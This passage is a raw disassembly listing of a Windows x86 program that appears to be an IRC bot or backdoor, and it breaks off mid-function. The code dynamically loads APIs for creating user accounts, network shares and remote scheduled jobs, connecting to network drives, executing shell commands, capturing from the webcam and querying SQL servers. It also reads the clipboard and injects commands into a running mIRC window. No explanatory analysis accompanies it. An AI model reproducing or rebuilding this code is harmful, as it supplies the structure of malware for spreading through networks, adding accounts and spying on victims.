jz loc_40861C
cmp ds:dword_436468, ebx
jz loc_40861C
cmp ds:dword_436464, ebx
jz loc_40861C
cmp ds:dword_4363A4, ebx
jz short loc_40861C
cmp ds:dword_4364B8, ebx
jz short loc_40861C
cmp ds:dword_4364CC, ebx
jz short loc_40861C
cmp ds:dword_436480, ebx
jz short loc_40861C
cmp ds:dword_436440, ebx
jz short loc_40861C
cmp ds:dword_436494, ebx
jz short loc_40861C
cmp ds:dword_436450, ebx
jz short loc_40861C
cmp ds:dword_436490, ebx
jz short loc_40861C
cmp ds:dword_4364FC, ebx
jz short loc_40861C
cmp ds:dword_436448, ebx
jz short loc_40861C
cmp ds:dword_43640C, ebx
jz short loc_40861C
cmp ds:dword_43647C, ebx
jz short loc_40861C
cmp ds:dword_4364EC, ebx
jz short loc_40861C
cmp ds:dword_436420, ebx
jz short loc_40861C
cmp eax, ebx
jnz short loc_408626
jmp short loc_40861C
; ---------------------------------------------------------------------------
loc_408611: ; CODE XREF: sub_407E65+501�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43654C, eax
loc_40861C: ; CODE XREF: sub_407E65+6A0�j
; sub_407E65+6AC�j ...
mov ds:dword_436548, 1
loc_408626: ; CODE XREF: sub_407E65+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz loc_40872B
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; sub_4DB076
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov ds:dword_4363AC, eax
call esi ; sub_4DB076
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov ds:dword_436338, eax
call esi ; sub_4DB076
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov ds:dword_436430, eax
call esi ; sub_4DB076
push offset aInternetconnec ; "InternetConnectA"
push edi
mov ds:dword_4363E4, eax
call esi ; sub_4DB076
push offset aInternetopena ; "InternetOpenA"
push edi
mov ds:dword_43643C, eax
call esi ; sub_4DB076
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov ds:dword_436400, eax
call esi ; sub_4DB076
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov ds:dword_436378, eax
call esi ; sub_4DB076
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov ds:dword_436370, eax
call esi ; sub_4DB076
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov ds:dword_436380, eax
call esi ; sub_4DB076
cmp ds:dword_4363AC, ebx
mov ecx, ds:dword_436400
mov ds:dword_43649C, eax
jz short loc_408707
cmp ds:dword_436338, ebx
jz short loc_408707
cmp ds:dword_436430, ebx
jz short loc_408707
cmp ds:dword_4363E4, ebx
jz short loc_408707
cmp ds:dword_43643C, ebx
jz short loc_408707
cmp ecx, ebx
jz short loc_408707
cmp ds:dword_436378, ebx
jz short loc_408707
cmp ds:dword_436370, ebx
jz short loc_408707
cmp ds:dword_436380, ebx
jz short loc_408707
cmp eax, ebx
jnz short loc_408711
loc_408707: ; CODE XREF: sub_407E65+860�j
; sub_407E65+868�j ...
mov ds:dword_436550, 1
loc_408711: ; CODE XREF: sub_407E65+8A0�j
cmp ecx, ebx
jz short loc_408746
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov ds:dword_436418, eax
jnz short loc_408746
jmp short loc_408740
; ---------------------------------------------------------------------------
loc_40872B: ; CODE XREF: sub_407E65+7CC�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436554, eax
mov ds:dword_436550, 1
loc_408740: ; CODE XREF: sub_407E65+8C4�j
mov ds:dword_436418, ebx
loc_408746: ; CODE XREF: sub_407E65+8AE�j
; sub_407E65+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_408790
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; sub_4DB076
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov ds:dword_4363F4, eax
call esi ; sub_4DB076
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov ds:dword_436520, eax
call esi ; sub_4DB076
cmp ds:dword_4363F4, ebx
mov ds:dword_43638C, eax
jz short loc_40879B
cmp ds:dword_436520, ebx
jz short loc_40879B
cmp eax, ebx
jnz short loc_4087A5
jmp short loc_40879B
; ---------------------------------------------------------------------------
loc_408790: ; CODE XREF: sub_407E65+8EC�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43655C, eax
loc_40879B: ; CODE XREF: sub_407E65+91B�j
; sub_407E65+923�j ...
mov ds:dword_436558, 1
loc_4087A5: ; CODE XREF: sub_407E65+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz loc_40889B
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; sub_4DB076
push offset aNetsharedel ; "NetShareDel"
push edi
mov ds:dword_436368, eax
call esi ; sub_4DB076
push offset aNetshareenum ; "NetShareEnum"
push edi
mov ds:dword_436340, eax
call esi ; sub_4DB076
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov ds:dword_4363B4, eax
call esi ; sub_4DB076
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov ds:dword_4363E8, eax
call esi ; sub_4DB076
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov ds:dword_4364F8, eax
call esi ; sub_4DB076
push offset aNetuseradd ; "NetUserAdd"
push edi
mov ds:dword_4363A0, eax
call esi ; sub_4DB076
push offset aNetuserdel ; "NetUserDel"
push edi
mov ds:dword_43634C, eax
call esi ; sub_4DB076
push offset aNetuserenum ; "NetUserEnum"
push edi
mov ds:dword_43633C, eax
call esi ; sub_4DB076
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov ds:dword_4363D0, eax
call esi ; sub_4DB076
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov ds:dword_4364C0, eax
call esi ; sub_4DB076
cmp ds:dword_436368, ebx
mov ds:dword_436478, eax
jz short loc_4088A6
cmp ds:dword_436340, ebx
jz short loc_4088A6
cmp ds:dword_4363B4, ebx
jz short loc_4088A6
cmp ds:dword_4363E8, ebx
jz short loc_4088A6
cmp ds:dword_4364F8, ebx
jz short loc_4088A6
cmp ds:dword_4363A0, ebx
jz short loc_4088A6
cmp ds:dword_43634C, ebx
jz short loc_4088A6
cmp ds:dword_43633C, ebx
jz short loc_4088A6
cmp ds:dword_4363D0, ebx
jz short loc_4088A6
cmp ds:dword_4364C0, ebx
jz short loc_4088A6
cmp eax, ebx
jnz short loc_4088B0
jmp short loc_4088A6
; ---------------------------------------------------------------------------
loc_40889B: ; CODE XREF: sub_407E65+94B�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436564, eax
loc_4088A6: ; CODE XREF: sub_407E65+9E6�j
; sub_407E65+9EE�j ...
mov ds:dword_436560, 1
loc_4088B0: ; CODE XREF: sub_407E65+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_4088E5
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; sub_4DB076
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov ds:dword_436390, eax
call esi ; sub_4DB076
cmp ds:dword_436390, ebx
mov ds:dword_436460, eax
jz short loc_4088F0
cmp eax, ebx
jnz short loc_4088FA
jmp short loc_4088F0
; ---------------------------------------------------------------------------
loc_4088E5: ; CODE XREF: sub_407E65+A56�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43656C, eax
loc_4088F0: ; CODE XREF: sub_407E65+A78�j
; sub_407E65+A7E�j
mov ds:dword_436568, 1
loc_4088FA: ; CODE XREF: sub_407E65+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_40892F
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; sub_4DB076
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov ds:dword_4364E4, eax
call esi ; sub_4DB076
cmp ds:dword_4364E4, ebx
mov ds:dword_4364E0, eax
jz short loc_40893A
cmp eax, ebx
jnz short loc_408944
jmp short loc_40893A
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_407E65+AA0�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436574, eax
loc_40893A: ; CODE XREF: sub_407E65+AC2�j
; sub_407E65+AC8�j
mov ds:dword_436570, 1
loc_408944: ; CODE XREF: sub_407E65+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_4089A3
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; sub_4DB076
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov ds:dword_436510, eax
call esi ; sub_4DB076
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov ds:dword_436508, eax
call esi ; sub_4DB076
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov ds:dword_4364D0, eax
call esi ; sub_4DB076
cmp ds:dword_436510, ebx
mov ds:dword_4363A8, eax
jz short loc_4089AE
cmp ds:dword_436508, ebx
jz short loc_4089AE
cmp ds:dword_4364D0, ebx
jz short loc_4089AE
cmp eax, ebx
jnz short loc_4089B8
jmp short loc_4089AE
; ---------------------------------------------------------------------------
loc_4089A3: ; CODE XREF: sub_407E65+AEA�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43657C, eax
loc_4089AE: ; CODE XREF: sub_407E65+B26�j
; sub_407E65+B2E�j ...
mov ds:dword_436578, 1
loc_4089B8: ; CODE XREF: sub_407E65+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_4089ED
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; sub_4DB076
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov ds:dword_4363DC, eax
call esi ; sub_4DB076
cmp ds:dword_4363DC, ebx
mov ds:dword_4364DC, eax
jz short loc_4089F8
cmp eax, ebx
jnz short loc_408A02
jmp short loc_4089F8
; ---------------------------------------------------------------------------
loc_4089ED: ; CODE XREF: sub_407E65+B5E�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436584, eax
loc_4089F8: ; CODE XREF: sub_407E65+B80�j
; sub_407E65+B86�j
mov ds:dword_436580, 1
loc_408A02: ; CODE XREF: sub_407E65+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_408A8B
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; sub_4DB076
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov ds:dword_4364A4, eax
call esi ; sub_4DB076
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov ds:dword_4364F0, eax
call esi ; sub_4DB076
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov ds:dword_43642C, eax
call esi ; sub_4DB076
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov ds:dword_4363EC, eax
call esi ; sub_4DB076
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov ds:dword_436484, eax
call esi ; sub_4DB076
cmp ds:dword_4364A4, ebx
mov ds:dword_4363F8, eax
jz short loc_408A96
cmp ds:dword_4364F0, ebx
jz short loc_408A96
cmp ds:dword_43642C, ebx
jz short loc_408A96
cmp ds:dword_4363EC, ebx
jz short loc_408A96
cmp ds:dword_436484, ebx
jz short loc_408A96
cmp eax, ebx
jnz short loc_408AA0
jmp short loc_408A96
; ---------------------------------------------------------------------------
loc_408A8B: ; CODE XREF: sub_407E65+BA8�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_43658C, eax
loc_408A96: ; CODE XREF: sub_407E65+BFE�j
; sub_407E65+C06�j ...
mov ds:dword_436588, 1
loc_408AA0: ; CODE XREF: sub_407E65+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; sub_4DAE83
mov edi, eax
cmp edi, ebx
jz short loc_408AD5
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; sub_4DB076
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov ds:dword_4363C0, eax
call esi ; sub_4DB076
cmp ds:dword_4363C0, ebx
mov ds:dword_436498, eax
jz short loc_408AE0
cmp eax, ebx
jnz short loc_408AEA
jmp short loc_408AE0
; ---------------------------------------------------------------------------
loc_408AD5: ; CODE XREF: sub_407E65+C46�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_436594, eax
loc_408AE0: ; CODE XREF: sub_407E65+C68�j
; sub_407E65+C6E�j
mov ds:dword_436590, 1
loc_408AEA: ; CODE XREF: sub_407E65+C6C�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AF2 proc near ; CODE XREF: sub_40D2E0+57D3�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp ds:dword_436528, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_408B3A
push ds:dword_43652C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408B3A: ; CODE XREF: sub_408AF2+1A�j
cmp ds:dword_436530, esi
jz short loc_408B6E
push ds:dword_436534
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408B6E: ; CODE XREF: sub_408AF2+4E�j
cmp ds:dword_436538, esi
jz short loc_408BA2
push ds:dword_43653C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408BA2: ; CODE XREF: sub_408AF2+82�j
cmp ds:dword_436540, esi
jz short loc_408BD6
push ds:dword_436544
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408BD6: ; CODE XREF: sub_408AF2+B6�j
cmp ds:dword_436548, esi
jz short loc_408C0A
push ds:dword_43654C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408C0A: ; CODE XREF: sub_408AF2+EA�j
cmp ds:dword_436550, esi
jz short loc_408C3E
push ds:dword_436554
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408C3E: ; CODE XREF: sub_408AF2+11E�j
cmp ds:dword_436558, esi
jz short loc_408C72
push ds:dword_43655C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408C72: ; CODE XREF: sub_408AF2+152�j
cmp ds:dword_436560, esi
jz short loc_408CA6
push ds:dword_436564
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408CA6: ; CODE XREF: sub_408AF2+186�j
cmp ds:dword_436568, esi
jz short loc_408CDA
push ds:dword_43656C
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408CDA: ; CODE XREF: sub_408AF2+1BA�j
cmp ds:dword_436570, esi
jz short loc_408D0E
push ds:dword_436574
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408D0E: ; CODE XREF: sub_408AF2+1EE�j
cmp ds:dword_436578, esi
jz short loc_408D42
push ds:dword_43657C
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408D42: ; CODE XREF: sub_408AF2+222�j
cmp ds:dword_436580, esi
jz short loc_408D76
push ds:dword_436584
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408D76: ; CODE XREF: sub_408AF2+256�j
cmp ds:dword_436588, esi
jz short loc_408DAA
push ds:dword_43658C
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408DAA: ; CODE XREF: sub_408AF2+28A�j
cmp ds:dword_436590, esi
jz short loc_408DDE
push ds:dword_436594
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_415480
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 20h
loc_408DDE: ; CODE XREF: sub_408AF2+2BE�j
lea eax, [ebp+var_200]
push offset unk_428E7C
push eax
call sub_415480
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_408E0B
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40BAE7
add esp, 14h
loc_408E0B: ; CODE XREF: sub_408AF2+302�j
lea eax, [ebp+var_200]
push eax
call sub_40A5B3
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_408AF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E1D proc near ; CODE XREF: sub_40D2E0+C5E�p
; sub_40D2E0+C92�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_408EA8
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_408EA8
cmp [ebp+arg_8], esi
jz short loc_408EA8
cmp byte ptr [eax], 0
jz short loc_408EA8
push ebx
push edi
call sub_42086A
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_408EA3
push [ebp+arg_4]
push edi
call sub_415A50
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_408E9C
sub eax, edi
push eax
push edi
push ebx
call sub_416D30
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_415C80
push eax
push [ebp+arg_8]
push ebx
call sub_416F00
push [ebp+arg_4]
call sub_415C80
add eax, esi
push eax
push ebx
call sub_415BA0
push ebx
push edi
call sub_415B90
add esp, 30h
mov esi, edi
loc_408E9C: ; CODE XREF: sub_408E1D+3C�j
push ebx
call sub_415DE1
pop ecx
loc_408EA3: ; CODE XREF: sub_408E1D+2B�j
mov eax, esi
pop ebx
jmp short loc_408EAA
; ---------------------------------------------------------------------------
loc_408EA8: ; CODE XREF: sub_408E1D+C�j
; sub_408E1D+13�j ...
xor eax, eax
loc_408EAA: ; CODE XREF: sub_408E1D+89�j
pop edi
pop esi
pop ebp
retn
sub_408E1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EAE proc near ; CODE XREF: sub_40D168+E9�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_415500
mov esi, [ebp+arg_0]
push esi
call sub_415C80
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_408EE4
or eax, 0FFFFFFFFh
jmp short loc_408F57
; ---------------------------------------------------------------------------
loc_408EE4: ; CODE XREF: sub_408EAE+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_408F06
loc_408EF0: ; CODE XREF: sub_408EAE+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_408EFD
cmp dl, 0Dh
jnz short loc_408F01
loc_408EFD: ; CODE XREF: sub_408EAE+48�j
and byte ptr [ecx+esi], 0
loc_408F01: ; CODE XREF: sub_408EAE+4D�j
inc ecx
cmp ecx, eax
jl short loc_408EF0
loc_408F06: ; CODE XREF: sub_408EAE+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_408F37
lea edi, [ebp+var_7CC]
loc_408F13: ; CODE XREF: sub_408EAE+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_408F32
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_408F32
cmp ebx, 1F4h
jge short loc_408F37
mov [edi], ecx
inc ebx
add edi, 4
loc_408F32: ; CODE XREF: sub_408EAE+69�j
; sub_408EAE+74�j
inc edx
cmp edx, eax
jl short loc_408F13
loc_408F37: ; CODE XREF: sub_408EAE+5D�j
; sub_408EAE+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_408F55
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_415560
add esp, 0Ch
loc_408F55: ; CODE XREF: sub_408EAE+8E�j
mov eax, ebx
loc_408F57: ; CODE XREF: sub_408EAE+34�j
pop esi
pop ebx
leave
retn
sub_408EAE endp
; =============== S U B R O U T I N E =======================================
sub_408F5B proc near ; CODE XREF: sub_408FB5+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_408F94
push ebx
mov ebx, edi
loc_408F78: ; CODE XREF: sub_408F5B+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_408F97
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_408F78
pop ebx
loc_408F94: ; CODE XREF: sub_408F5B+18�j
pop edi
pop esi
retn
sub_408F5B endp
; =============== S U B R O U T I N E =======================================
sub_408F97 proc near ; CODE XREF: sub_408F5B+25�p
; sub_408FB5+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_417221
cmp al, 61h
pop ecx
jl short loc_408FB2
cmp al, 7Ah
jg short loc_408FB2
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_408FB2: ; CODE XREF: sub_408F97+E�j
; sub_408F97+12�j
xor eax, eax
retn
sub_408F97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408FB5 proc near ; CODE XREF: sub_40A693+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_415D00
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_415C80
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_415C80
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_408F5B
add esp, 14h
dec esi
mov edi, esi
loc_408FF3: ; CODE XREF: sub_408FB5+B6�j
test esi, esi
jle short loc_409071
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_417221
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_417221
pop ecx
cmp eax, ebx
pop ecx
jz short loc_409069
loc_409019: ; CODE XREF: sub_408FB5+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_408F97
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_40903A
mov eax, ecx
loc_40903A: ; CODE XREF: sub_408FB5+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_40906D
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_417221
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_417221
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_409019
loc_409069: ; CODE XREF: sub_408FB5+62�j
dec edi
dec esi
jmp short loc_408FF3
; ---------------------------------------------------------------------------
loc_40906D: ; CODE XREF: sub_408FB5+8A�j
xor eax, eax
jmp short loc_409076
; ---------------------------------------------------------------------------
loc_409071: ; CODE XREF: sub_408FB5+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_409076: ; CODE XREF: sub_408FB5+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_408FB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40907B proc near ; CODE XREF: sub_40D2E0+3C8C�p
; sub_40D2E0+4AF5�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_42206C ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4220E4 ; FormatMessageA
lea eax, [ebp+var_100]
loc_4090B4: ; CODE XREF: sub_40907B+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_4090C0
cmp cl, 9
jnz short loc_4090C3
loc_4090C0: ; CODE XREF: sub_40907B+3E�j
inc eax
jmp short loc_4090B4
; ---------------------------------------------------------------------------
loc_4090C3: ; CODE XREF: sub_40907B+43�j
; sub_40907B+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_4090DD
mov cl, [eax]
cmp cl, 2Eh
jz short loc_4090C3
cmp cl, 21h
jl short loc_4090C3
loc_4090DD: ; CODE XREF: sub_40907B+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_436598
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_4159FA
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40907B endp
; =============== S U B R O U T I N E =======================================
sub_409105 proc near ; CODE XREF: sub_40D2E0+5732�p
push esi
push 0
call ds:dword_436438 ; OpenClipboard
test eax, eax
jz short loc_40913C
push 1
call ds:dword_436458 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_40913C
push edi
push esi
call ds:dword_4220EC ; GlobalLock
push esi
mov edi, eax
call ds:dword_4220E8 ; GlobalUnlock
call ds:dword_4364BC ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40913C: ; CODE XREF: sub_409105+B�j
; sub_409105+19�j
xor eax, eax
pop esi
retn
sub_409105 endp
; =============== S U B R O U T I N E =======================================
sub_409140 proc near ; CODE XREF: sub_40D2E0+48BF�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc ; "mIRC"
push esi
push edi
call ds:dword_436474 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_4091BC
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:off_4220F8
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:off_4220F4
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_415480
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call ds:dword_4364C4 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call ds:dword_4364C4 ; SendMessageA
push ebx
call ds:off_4220F0
push edi
call ds:off_422074
push 1
pop eax
pop ebx
jmp short loc_4091BE
; ---------------------------------------------------------------------------
loc_4091BC: ; CODE XREF: sub_409140+16�j
xor eax, eax
